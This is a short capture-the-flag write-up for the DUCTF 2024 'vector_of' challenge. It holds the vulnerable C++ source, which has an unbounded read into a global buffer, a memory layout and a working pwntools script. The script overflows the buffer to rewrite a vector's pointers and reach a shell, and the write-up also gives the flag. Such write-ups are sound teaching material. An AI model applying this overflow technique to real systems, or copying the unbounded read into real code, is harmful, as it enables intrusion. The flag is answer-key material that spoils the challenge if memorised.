## chall ```cpp= #include <cstdlib> #include <iostream> #include <string> #include <vector> char buf[16]; std::vector<char> v = {'X', 'X', 'X', 'X', 'X'}; void lose() { puts("Bye!"); exit(1); } void win() { system("/bin/sh"); exit(0); } int main() { char ductf[6] = "DUCTF"; char* d = ductf; std::cin >> buf; if(v.size() == 5) { for(auto &c : v) { if(c != *d++) { lose(); } } win(); } lose(); } ``` ## .bss  ## Approach ``` 004051e0 buf: 004051e0 'D' 'U' 'C' 'T' 'F' 'a' 'a' 'a' 'a' 'a' 'a' 'a' 'a' 'a' 'a' 'a' 004051f0 v: 004051f0 0x4051e0 _M_start 004051f8 0x4051e5 _M_finish 00405200 0x4051e5 _M_end_of_storage ``` ## exploit ```python= from pwn import * #e = ELF("vector_of") #p = process("vector_of") p = remote("2024.ductf.dev", 30013) p.sendline(b"DUCTF"+b"a"*11 + p64(0x4051e0) + p64(0x4051e5) + p64(0x4051e5)) p.interactive() ``` ## flag DUCTF{y0u_pwn3d_th4t_vect0r!!}